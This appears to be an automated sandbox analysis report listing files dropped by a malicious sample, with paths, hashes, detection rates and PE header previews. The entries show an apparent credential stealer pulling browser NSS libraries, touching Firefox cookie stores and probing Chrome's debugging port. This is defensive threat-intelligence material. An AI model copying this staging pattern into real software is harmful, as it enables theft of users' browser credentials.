SSDEEP:	49152:BGngMGxn+8/aE+7DBblqTBvxFy8lQ5G4WljbtcA:BGngMUn+8CE+7DBbkXFtQ+btcA
MD5:	8F709B9F69AA0641DFE7825D161E10B1
SHA1:	FF49A87AF050FC140A29832CEA9BED2E367BAA40
SHA-256:	5753E2489A3FADE0DE93E2E6D111509DD9D16E6BE67A35F6C6DAF09C7587130D
SHA-512:	DF2F5BF6EED14ECAE2C7C9D3074F4143F3DCF0FD52559D5000904AB0599D363F9D691DB1CD28D1B0E5450B44584974B5B739C364E653EADEAE49409754A8C5C1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................1......(1...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...gjurczzz. +.......+.................@...jwharnkx......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3258368
Entropy (8bit):	6.661496661540679
Encrypted:	false
SSDEEP:	98304:5D1rocclYdPWK+d6SHVP1wdrbCpzFSHYZ0OCGOcywpXHk2FFbD:B1rocclYdPWK+d6SHVP1wdrbCpzFS/G1
MD5:	EC648136F42F41AEE2EFDC8361EA2508
SHA1:	79A5934E49F368FEE997E267B93863DA1FCD298C
SHA-256:	ABF71F5D21AB7EC91286E8DC11C2B52CA70A2B2271C6DC9D428F5BCE3FDB7A79
SHA-512:	7CDD659AE32CFE653809D42FD0EAE32BA33880F900E7A4C2937CA6AC35E63F21199D911775A7C7AEB1321683B84D1CD9696D785A2FE708078D1B1489F95D72C4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1......(2...@.................................W...k............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...sxcussbd..+.......*.................@...nssdjnnb......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2767360
Entropy (8bit):	6.489783129787192
Encrypted:	false
SSDEEP:	49152:SR/eaSA17q0ipD/ltPp0C1vaPRrSTq+0uVzCjMez5bxQ:SR/e5A17q0ih/ltPpXvaNSV0uQx5by
MD5:	473F352CE19AFF187F350C8D868C6C86
SHA1:	FAA6D46E247306E16AAB6B8D26371E83C067B7B4
SHA-256:	2842588E34D737CEEAC107A4622F128055EA4FCCFCF49A321094570D492C8BF3
SHA-512:	EBDD9C814C2C754705136B8BFAD9C78C252AB4C6A7D8DA5C7005D134982FDFDFF981A2893A8C223619090D3C8D269B6F7E795F98C29E456D460BF3B2843C842B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ..............................S...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...qrrrzfoe..).......)..:..............@...uhnzwkhm. ........................@....taggant.@......"....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\test2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2900584
Entropy (8bit):	6.550777306751561
Encrypted:	false
SSDEEP:	49152:MPzW1GU/MJRAcs2vZ5TtbcooHGPBxFgxlsgF7T+BYLHJBAUrbnTToaBRfnHJ+4Kh:MPoP0JB/Nf5C+gFuBwZUwzb1o
MD5:	DCC94134DB4DA64356CDCD25E7E88625
SHA1:	5A93798952A5664F48D3EA2C058943A2CC40D2DE
SHA-256:	7B3D4C9641906CB5695A24C693C1F1E061B06B0E84F190B50EC873638E1D0FBD
SHA-512:	79359684FB29B7F0DA7EA629C77A7DDEB0723E5356793E386FF7D86AC0C60F08FEDC68C5BF8CE42C8CA33C7D9C7ACBA093ACC0E005566AFB302E6D01BA39F4BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....I1g.........."...........+.....@..........@..............................,...........`.................................................h...<.....,.x....P,.......,.h(....,.x...............................(.......8...............X............................text............................... ..`.rdata...!......."..................@..@.data....h+......V+.................@....pdata.......P,.......,.............@..@.00cfg.......`,.......,.............@..@.tls.........p,.......,.............@....rsrc...x.....,.......,.............@..@.reloc..x.....,.......,.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.368560840421125
Encrypted:	false
SSDEEP:	48:SfNaoQ1TEQgfNaoQ6Q2QEfNaoQjsaQjCfNaoQj00UrU0U8Q/:6NnQ1TEQsNnQ6Q2QwNnQjsaQjqNnQj04
MD5:	99BF292408947CF634916F67A066F143
SHA1:	C8F18E4D294C70DCF1873294AC288BB70214CAEF
SHA-256:	87F574E0BA52804056A160CFEC661CD6533A08AA120F5BB182C48D2D83739CAA
SHA-512:	8F74AD7F284375F1F3129F8ED8D649E00FFA4C3C61CBA868CDF3EA8F77DD02969C2F09236EE20090C57DA96A84FEC720D4336F8D5BFD48B9C1926AC5DFC8B2CE
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/E9880A7C5666D19E9539B0A21C690547",.. "id": "E9880A7C5666D19E9539B0A21C690547",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/E9880A7C5666D19E9539B0A21C690547"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/ED9A155AC23005E7393B708E8F7DBEAE",.. "id": "ED9A155AC23005E7393B708E8F7DBEAE",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/ED9A155AC23005E7393B708E8F7DBEAE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.944672326899399
Encrypted:	false
SSDEEP:	49152:aUnOj0tKvsR4kUgGLojrQPiovOQD+VeuoluCjNi:aQJtKvBZLojsH7yVeuosCjY
MD5:	AE6AB1ACA8B68F61F6C9ECB97D418FB1
SHA1:	2B5C95867BD0231103CF1D900CE012C9019149DB
SHA-256:	2D1685358E826D1F0CAD55EB2BAE7FB87B4E40222DC947D2DFC217911BA6634C
SHA-512:	0C816E7545F414C2E7E25BFDD1730C4B0706BDDBD84DA48F3757768DE442E7479393E0504AF429C7CADF81B72B2D2D50BE3DD2337AE420ED038833015DA8C1A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......j...........@...........................j.....~.....@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... .0+...$......t..............@...oovdzvsf......O......v..............@...lmbmcfaf......j.....................@....taggant.0....j.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\1005413001\test2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2900584
Entropy (8bit):	6.550777306751561
Encrypted:	false
SSDEEP:	49152:MPzW1GU/MJRAcs2vZ5TtbcooHGPBxFgxlsgF7T+BYLHJBAUrbnTToaBRfnHJ+4Kh:MPoP0JB/Nf5C+gFuBwZUwzb1o
MD5:	DCC94134DB4DA64356CDCD25E7E88625
SHA1:	5A93798952A5664F48D3EA2C058943A2CC40D2DE
SHA-256:	7B3D4C9641906CB5695A24C693C1F1E061B06B0E84F190B50EC873638E1D0FBD
SHA-512:	79359684FB29B7F0DA7EA629C77A7DDEB0723E5356793E386FF7D86AC0C60F08FEDC68C5BF8CE42C8CA33C7D9C7ACBA093ACC0E005566AFB302E6D01BA39F4BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....I1g.........."...........+.....@..........@..............................,...........`.................................................h...<.....,.x....P,.......,.h(....,.x...............................(.......8...............X............................text............................... ..`.rdata...!......."..................@..@.data....h+......V+.................@....pdata.......P,.......,.............@..@.00cfg.......`,.......,.............@..@.tls.........p,.......,.............@....rsrc...x.....,.......,.............@..@.reloc..x.....,.......,.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3199488
Entropy (8bit):	6.621265967302453
Encrypted:	false
SSDEEP:	49152:BGngMGxn+8/aE+7DBblqTBvxFy8lQ5G4WljbtcA:BGngMUn+8CE+7DBbkXFtQ+btcA
MD5:	8F709B9F69AA0641DFE7825D161E10B1
SHA1:	FF49A87AF050FC140A29832CEA9BED2E367BAA40
SHA-256:	5753E2489A3FADE0DE93E2E6D111509DD9D16E6BE67A35F6C6DAF09C7587130D
SHA-512:	DF2F5BF6EED14ECAE2C7C9D3074F4143F3DCF0FD52559D5000904AB0599D363F9D691DB1CD28D1B0E5450B44584974B5B739C364E653EADEAE49409754A8C5C1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................1......(1...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...gjurczzz. +.......+.................@...jwharnkx......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.944672326899399
Encrypted:	false
SSDEEP:	49152:aUnOj0tKvsR4kUgGLojrQPiovOQD+VeuoluCjNi:aQJtKvBZLojsH7yVeuosCjY
MD5:	AE6AB1ACA8B68F61F6C9ECB97D418FB1
SHA1:	2B5C95867BD0231103CF1D900CE012C9019149DB
SHA-256:	2D1685358E826D1F0CAD55EB2BAE7FB87B4E40222DC947D2DFC217911BA6634C
SHA-512:	0C816E7545F414C2E7E25BFDD1730C4B0706BDDBD84DA48F3757768DE442E7479393E0504AF429C7CADF81B72B2D2D50BE3DD2337AE420ED038833015DA8C1A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......j...........@...........................j.....~.....@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... .0+...$......t..............@...oovdzvsf......O......v..............@...lmbmcfaf......j.....................@....taggant.0....j.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2767360
Entropy (8bit):	6.489783129787192
Encrypted:	false
SSDEEP:	49152:SR/eaSA17q0ipD/ltPp0C1vaPRrSTq+0uVzCjMez5bxQ:SR/e5A17q0ih/ltPpXvaNSV0uQx5by
MD5:	473F352CE19AFF187F350C8D868C6C86
SHA1:	FAA6D46E247306E16AAB6B8D26371E83C067B7B4
SHA-256:	2842588E34D737CEEAC107A4622F128055EA4FCCFCF49A321094570D492C8BF3
SHA-512:	EBDD9C814C2C754705136B8BFAD9C78C252AB4C6A7D8DA5C7005D134982FDFDFF981A2893A8C223619090D3C8D269B6F7E795F98C29E456D460BF3B2843C842B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ..............................S...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...qrrrzfoe..).......)..:..............@...uhnzwkhm. ........................@....taggant.@......"....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rh0pdnc.j51.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktgx0h4r.p45.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sq5m54hf.1kp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_utql55yv.xrs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsHDGDGHCAAK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3258368
Entropy (8bit):	6.661496661540679
Encrypted:	false
SSDEEP:	98304:5D1rocclYdPWK+d6SHVP1wdrbCpzFSHYZ0OCGOcywpXHk2FFbD:B1rocclYdPWK+d6SHVP1wdrbCpzFS/G1
MD5:	EC648136F42F41AEE2EFDC8361EA2508
SHA1:	79A5934E49F368FEE997E267B93863DA1FCD298C
SHA-256:	ABF71F5D21AB7EC91286E8DC11C2B52CA70A2B2271C6DC9D428F5BCE3FDB7A79
SHA-512:	7CDD659AE32CFE653809D42FD0EAE32BA33880F900E7A4C2937CA6AC35E63F21199D911775A7C7AEB1321683B84D1CD9696D785A2FE708078D1B1489F95D72C4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1......(2...@.................................W...k............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...sxcussbd..+.......*.................@...nssdjnnb......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
